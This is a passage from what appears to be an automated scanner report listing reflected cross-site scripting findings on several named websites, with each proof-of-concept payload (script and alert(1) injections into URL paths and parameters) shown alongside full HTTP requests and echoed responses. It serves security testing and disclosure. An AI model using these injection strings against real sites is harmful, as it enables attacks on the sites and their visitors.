Confidence:   Certain
Host:   http://w10.localadbuy.com
Path:   /servlet/ajrotator/550/0/vj

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 354e5<script>alert(1)</script>7c956fd878a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlet354e5<script>alert(1)</script>7c956fd878a/ajrotator/550/0/vj?z=1&dim=406&pos=1&kw=business&pv=2784063408616931&nc=38240663&tz=300&url=http%3A%2F%2Fwww.fox8live.com%2Fbusiness%2Fdefault.aspx HTTP/1.1
Host: w10.localadbuy.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/business/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optin=Aa; ajess1_ADC1D6F3755E8D01B90FBB31=a; ajcmp=20235d_003CFd

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Mon, 09 May 2011 15:37:03 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /servlet354e5<script>alert(1)</script>7c956fd878a/ajrotator/550/0/vj not found</pre>
<BR>

2.117. http://w10.localadbuy.com/servlet/ajrotator/550/0/vj [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://w10.localadbuy.com
Path:   /servlet/ajrotator/550/0/vj

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 23c91<script>alert(1)</script>fc29d31c5f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlet/ajrotator23c91<script>alert(1)</script>fc29d31c5f/550/0/vj?z=1&dim=406&pos=1&kw=business&pv=2784063408616931&nc=38240663&tz=300&url=http%3A%2F%2Fwww.fox8live.com%2Fbusiness%2Fdefault.aspx HTTP/1.1
Host: w10.localadbuy.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/business/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optin=Aa; ajess1_ADC1D6F3755E8D01B90FBB31=a; ajcmp=20235d_003CFd

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Mon, 09 May 2011 15:37:04 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /servlet/ajrotator23c91<script>alert(1)</script>fc29d31c5f/550/0/vj not found</pre>
<BR>

2.118. http://w10.localadbuy.com/servlet/ajrotator/551/0/vj [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://w10.localadbuy.com
Path:   /servlet/ajrotator/551/0/vj

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2c1d1<script>alert(1)</script>a1d5365b88f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlet2c1d1<script>alert(1)</script>a1d5365b88f/ajrotator/551/0/vj?z=1&dim=406&pos=4&kw=homepage&pv=298638020176442&nc=59843325&tz=300&url=http%3A%2F%2Fwww.fox8live.com%2Fdefault.aspx&refer=http%3A%2F%2Fwww.fox8live.com%2Fnews%2Flocal%2Fstory%2FSt-Bernard-prepares-for-rising-Mississippi-River%2FvJUO9a9n60iNAXZ6QCm2oQ.cspx HTTP/1.1
Host: w10.localadbuy.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optin=Aa; ajess1_ADC1D6F3755E8D01B90FBB31=a; ajcmp=20235d_003CFd

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Mon, 09 May 2011 15:39:45 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /servlet2c1d1<script>alert(1)</script>a1d5365b88f/ajrotator/551/0/vj not found</pre>
<BR>

2.119. http://w10.localadbuy.com/servlet/ajrotator/551/0/vj [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://w10.localadbuy.com
Path:   /servlet/ajrotator/551/0/vj

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3a9f7<script>alert(1)</script>6b4ddb0cab5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /servlet/ajrotator3a9f7<script>alert(1)</script>6b4ddb0cab5/551/0/vj?z=1&dim=406&pos=4&kw=homepage&pv=298638020176442&nc=59843325&tz=300&url=http%3A%2F%2Fwww.fox8live.com%2Fdefault.aspx&refer=http%3A%2F%2Fwww.fox8live.com%2Fnews%2Flocal%2Fstory%2FSt-Bernard-prepares-for-rising-Mississippi-River%2FvJUO9a9n60iNAXZ6QCm2oQ.cspx HTTP/1.1
Host: w10.localadbuy.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optin=Aa; ajess1_ADC1D6F3755E8D01B90FBB31=a; ajcmp=20235d_003CFd

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Mon, 09 May 2011 15:39:45 GMT
Content-Type: text/html

<H1>404 Not Found</H1>
<pre>Resource /servlet/ajrotator3a9f7<script>alert(1)</script>6b4ddb0cab5/551/0/vj not found</pre>
<BR>

2.120. http://wvue.web.entriq.net/nw/dpm/loadplayer/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://wvue.web.entriq.net
Path:   /nw/dpm/loadplayer/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a1658<a>f37537d35d2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /nwa1658<a>f37537d35d2/dpm/loadplayer/?instanceGUID=5ED1F7E8-1A85-BA06-44C9-9FD864CC049C&affiliateGUID=&mt=1&playerID=DayPortPlayerCallBack.DayPortPlayer_0&domain=wvue.web.entriq.net&v=2011491537 HTTP/1.1
Host: wvue.web.entriq.net
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/business/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Mon, 09 May 2011 15:38:07 GMT
Server: Apache
X-Host: w3
Vary: Accept-Encoding
Cache-Control: max-age=60
Expires: Mon, 09 May 2011 15:39:07 GMT
Content-Type: text/html
Content-Length: 674

</table>&nbsp;Invalid Layout File: The layout file templates/user/wvue/layouts/nwa1658<a>f37537d35d2.xml or an appropriate 404 alternative does not exist<br><br><br><br><br><br><br><br><br><br><br><br
...[SNIP]...

2.121. http://wvue.web.entriq.net/nw/dpm/loadplayer/ [playerID parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://wvue.web.entriq.net
Path:   /nw/dpm/loadplayer/

Issue detail

The value of the playerID request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 18a4c(a)2aba04c4501 was submitted in the playerID parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nw/dpm/loadplayer/?instanceGUID=5ED1F7E8-1A85-BA06-44C9-9FD864CC049C&affiliateGUID=&mt=1&playerID=DayPortPlayerCallBack.DayPortPlayer_018a4c(a)2aba04c4501&domain=wvue.web.entriq.net&v=2011491537 HTTP/1.1
Host: wvue.web.entriq.net
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/business/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:38:02 GMT
Server: Apache
X-Host: w12
Vary: Accept-Encoding
Cache-Control: max-age=3600
Expires: Mon, 09 May 2011 16:38:02 GMT
Content-Type: text/javascript
Content-Length: 61867

/*
   Player TYPE 2
   DayPort, Inc.
*/
DayPortPlayerCallBack.DayPortPlayer_018a4c(a)2aba04c4501.embed = function()
{
   this.version = "201001251308";
   
   this.imageDomain = "wvue.img.entriq.net";
   this.domain = "wvue.web.entriq.net";
   this.noCacheDomain = "wvue.web.entriq.net";
   
   this.affiliateID
...[SNIP]...

2.122. http://www.collegesurfing.com/searchbox-mge-us.php [id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.collegesurfing.com
Path:   /searchbox-mge-us.php

Issue detail

The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68879"><script>alert(1)</script>7a0fb199d01 was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /searchbox-mge-us.php?id=1282808868879"><script>alert(1)</script>7a0fb199d01&type=MGEUSDEST&style=&affiliatesearchboxid=7851&program_type= HTTP/1.1
Host: www.collegesurfing.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerwww.collegesurfing.com=1006764042.20480.0000; PHPSESSID=3eicgiuhi2dvuo76dhkvncnek6; AFF_ID=6; AFF_URL=http%3A%2F%2Fwww.collegesurfing.com%2Fsearchbox-mge-us.php%3Fid%3D12828088%26type%3DMGEUSDEST%26style%3D%26affiliatesearchboxid%3D7851%26program_type%3D

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:35:26 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 11482

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <link href="/css/searchbox-mge-us.css" rel="stylesheet" type="text/css" />
   <script src="/js/dojo/dojo/dojo.js"></script>
</head>
<body>
<sc
...[SNIP]...
<input type="hidden" name="id" value="1282808868879"><script>alert(1)</script>7a0fb199d01">
...[SNIP]...

2.123. http://www.csmonitor.com/Business [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /Business

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e3b56"-alert(1)-"5f879a42391 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Businesse3b56"-alert(1)-"5f879a42391 HTTP/1.1
Host: www.csmonitor.com
Proxy-Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=02a30c09840b7ee1:T=1304954833:S=ALNI_MYQDe4BczMf1S4cz7YNVrMV1DZneg; __qca=P0-103944696-1304954839995; s_vmonthnum=1306904400533%26vn%3D1; s_vi=[CS]v1|26E40435851D1B0E-6000010600650711[CE]; s_cc=true; s_nr=1304955268151-New; c_m=undefinedburpburp; rvd=1304955268153%3E0%3A1; rvd_s=1; s_depth=4; s_lv=1304955268156; s_lv_s=First%20Visit; s_invisit=true; s_vnum=1308843268157%26vn%3D1; s_monthinvisit=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Mon, 09 May 2011 15:35:00 GMT
Served-by:
Content-Language: en-US
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Cache-Control: public, must-revalidate, max-age=86376
Expires: Tue, 10 May 2011 15:34:37 GMT
Date: Mon, 09 May 2011 15:35:01 GMT
Connection: close
Content-Length: 31494

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title> Not
...[SNIP]...
<script language="JavaScript" type="text/javascript">
                           s.pageName="/Businesse3b56"-alert(1)-"5f879a42391";
           
           var s_code=s.t();if(s_code)document.write(s_code);
       </script>
...[SNIP]...

2.124. http://www.csmonitor.com/Business/2011/0509/Gas-prices-start-to-head-down [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /Business/2011/0509/Gas-prices-start-to-head-down

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b75d3"-alert(1)-"e5051c0c7b7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Businessb75d3"-alert(1)-"e5051c0c7b7/2011/0509/Gas-prices-start-to-head-down HTTP/1.1
Host: www.csmonitor.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=02a30c09840b7ee1:T=1304954833:S=ALNI_MYQDe4BczMf1S4cz7YNVrMV1DZneg; __qca=P0-103944696-1304954839995; s_vmonthnum=1306904400533%26vn%3D1; s_vi=[CS]v1|26E40435851D1B0E-6000010600650711[CE]; c_m=undefinedburpburp; s_cc=true; s_depth=6; s_nr=1304955476727-New; rvd=1304955476728%3E0%3A1; rvd_s=1; s_lv=1304955476729; s_lv_s=First%20Visit; s_invisit=true; s_vnum=1308843476731%26vn%3D1; s_monthinvisit=true; s_sq=fcocscsm%3D%2526pid%253Dbusiness%2526pidt%253D1%2526oid%253Dhttp%25253A//www.csmonitor.com/Business/2011/0509/Gas-prices-start-to-head-down%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Mon, 09 May 2011 15:38:08 GMT
Served-by:
Content-Language: en-US
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Cache-Control: public, must-revalidate, max-age=86400
Expires: Tue, 10 May 2011 15:38:08 GMT
Date: Mon, 09 May 2011 15:38:08 GMT
Connection: close
Content-Length: 31574

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title> Not
...[SNIP]...
<script language="JavaScript" type="text/javascript">
                           s.pageName="/Businessb75d3"-alert(1)-"e5051c0c7b7/2011/0509/Gas-prices-start-to-head-down";
           
           var s_code=s.t();if(s_code)document.write(s_code);
       </script>
...[SNIP]...

2.125. http://www.csmonitor.com/Business/2011/0509/Gas-prices-start-to-head-down [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /Business/2011/0509/Gas-prices-start-to-head-down

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4befc"-alert(1)-"229bb0a2d73 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Business/20114befc"-alert(1)-"229bb0a2d73/0509/Gas-prices-start-to-head-down HTTP/1.1
Host: www.csmonitor.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=02a30c09840b7ee1:T=1304954833:S=ALNI_MYQDe4BczMf1S4cz7YNVrMV1DZneg; __qca=P0-103944696-1304954839995; s_vmonthnum=1306904400533%26vn%3D1; s_vi=[CS]v1|26E40435851D1B0E-6000010600650711[CE]; c_m=undefinedburpburp; s_cc=true; s_depth=6; s_nr=1304955476727-New; rvd=1304955476728%3E0%3A1; rvd_s=1; s_lv=1304955476729; s_lv_s=First%20Visit; s_invisit=true; s_vnum=1308843476731%26vn%3D1; s_monthinvisit=true; s_sq=fcocscsm%3D%2526pid%253Dbusiness%2526pidt%253D1%2526oid%253Dhttp%25253A//www.csmonitor.com/Business/2011/0509/Gas-prices-start-to-head-down%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Mon, 09 May 2011 15:38:13 GMT
Served-by:
Content-Language: en-US
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Cache-Control: public, must-revalidate, max-age=86399
Expires: Tue, 10 May 2011 15:38:12 GMT
Date: Mon, 09 May 2011 15:38:13 GMT
Connection: close
Content-Length: 31574

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title> Not
...[SNIP]...
<script language="JavaScript" type="text/javascript">
                           s.pageName="/Business/20114befc"-alert(1)-"229bb0a2d73/0509/Gas-prices-start-to-head-down";
           
           var s_code=s.t();if(s_code)document.write(s_code);
       </script>
...[SNIP]...

2.126. http://www.csmonitor.com/Business/2011/0509/Gas-prices-start-to-head-down [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /Business/2011/0509/Gas-prices-start-to-head-down

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48666"-alert(1)-"a40ab4b1207 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Business/2011/050948666"-alert(1)-"a40ab4b1207/Gas-prices-start-to-head-down HTTP/1.1
Host: www.csmonitor.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=02a30c09840b7ee1:T=1304954833:S=ALNI_MYQDe4BczMf1S4cz7YNVrMV1DZneg; __qca=P0-103944696-1304954839995; s_vmonthnum=1306904400533%26vn%3D1; s_vi=[CS]v1|26E40435851D1B0E-6000010600650711[CE]; c_m=undefinedburpburp; s_cc=true; s_depth=6; s_nr=1304955476727-New; rvd=1304955476728%3E0%3A1; rvd_s=1; s_lv=1304955476729; s_lv_s=First%20Visit; s_invisit=true; s_vnum=1308843476731%26vn%3D1; s_monthinvisit=true; s_sq=fcocscsm%3D%2526pid%253Dbusiness%2526pidt%253D1%2526oid%253Dhttp%25253A//www.csmonitor.com/Business/2011/0509/Gas-prices-start-to-head-down%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Mon, 09 May 2011 15:38:17 GMT
Served-by:
Content-Language: en-US
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Cache-Control: public, must-revalidate, max-age=86397
Expires: Tue, 10 May 2011 15:38:14 GMT
Date: Mon, 09 May 2011 15:38:17 GMT
Connection: close
Content-Length: 31574

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title> Not
...[SNIP]...
<script language="JavaScript" type="text/javascript">
                           s.pageName="/Business/2011/050948666"-alert(1)-"a40ab4b1207/Gas-prices-start-to-head-down";
           
           var s_code=s.t();if(s_code)document.write(s_code);
       </script>
...[SNIP]...

2.127. http://www.csmonitor.com/Business/2011/0509/Gas-prices-start-to-head-down [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /Business/2011/0509/Gas-prices-start-to-head-down

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81f5a"-alert(1)-"1903108f0c0 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Business/2011/0509/Gas-prices-start-to-head-down81f5a"-alert(1)-"1903108f0c0 HTTP/1.1
Host: www.csmonitor.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/Business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=02a30c09840b7ee1:T=1304954833:S=ALNI_MYQDe4BczMf1S4cz7YNVrMV1DZneg; __qca=P0-103944696-1304954839995; s_vmonthnum=1306904400533%26vn%3D1; s_vi=[CS]v1|26E40435851D1B0E-6000010600650711[CE]; c_m=undefinedburpburp; s_cc=true; s_depth=6; s_nr=1304955476727-New; rvd=1304955476728%3E0%3A1; rvd_s=1; s_lv=1304955476729; s_lv_s=First%20Visit; s_invisit=true; s_vnum=1308843476731%26vn%3D1; s_monthinvisit=true; s_sq=fcocscsm%3D%2526pid%253Dbusiness%2526pidt%253D1%2526oid%253Dhttp%25253A//www.csmonitor.com/Business/2011/0509/Gas-prices-start-to-head-down%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.12 (Ubuntu)
X-Powered-By: eZ Publish
Pragma: no-cache
Last-Modified: Mon, 09 May 2011 15:38:22 GMT
Served-by:
Content-Language: en-US
Status: 404 Not Found
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Cache-Control: public, must-revalidate, max-age=86400
Expires: Tue, 10 May 2011 15:38:22 GMT
Date: Mon, 09 May 2011 15:38:22 GMT
Connection: close
Content-Length: 31574

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title> Not
...[SNIP]...
<script language="JavaScript" type="text/javascript">
                           s.pageName="/Business/2011/0509/Gas-prices-start-to-head-down81f5a"-alert(1)-"1903108f0c0";
           
           var s_code=s.t();if(s_code)document.write(s_code);
       </script>
...[SNIP]...

2.128. http://www.fox8live.com/widgets/serve.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /widgets/serve.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 225ed'-alert(1)-'5d65b809296 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /widgets/serve.aspx?wid=b9fd9b2c-4752-4433-8ab5-6a62e33475f4&ver=1&225ed'-alert(1)-'5d65b809296=1 HTTP/1.1
Host: www.fox8live.com
Proxy-Connection: keep-alive
Referer: http://www.fox8live.com/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-44190619-1304954806906; AxData=; Axxd=1; uts=12; poll_d71e7e2a-acae-43ec-bfe0-b7d3e938b303=novote

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:40:06 GMT
Server: PWS/1.7.2.1
X-Px: ms iad-agg-n30 ( iad-agg-n27), ms iad-agg-n27 ( origin)
Cache-Control: max-age=121
Expires: Mon, 09 May 2011 15:42:07 GMT
Age: 0
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Px-Uncompress-Origin: 9234
Connection: keep-alive
Content-Length: 9234


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head id="ctl00_ctl00_Head1">
...[SNIP]...
) && (IDMUtilsJS_Loaded)) {
Goto(searchval);
}
}
function Goto(searchval) {
var sFormat = 'click.ashx?type=business&name={0}&address=New Orleans, LA&wid=b9fd9b2c-4752-4433-8ab5-6a62e33475f4&ver=1&225ed'-alert(1)-'5d65b809296=1';
var sSubmitTarget = String.format(sFormat, searchval);
window.open(sSubmitTarget, "wSILSearch");
}

</script>
...[SNIP]...

2.129. http://www.macroaxis.com/widgets/url.jsp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.macroaxis.com
Path:   /widgets/url.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cbb11"-alert(1)-"0ecdb942be3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

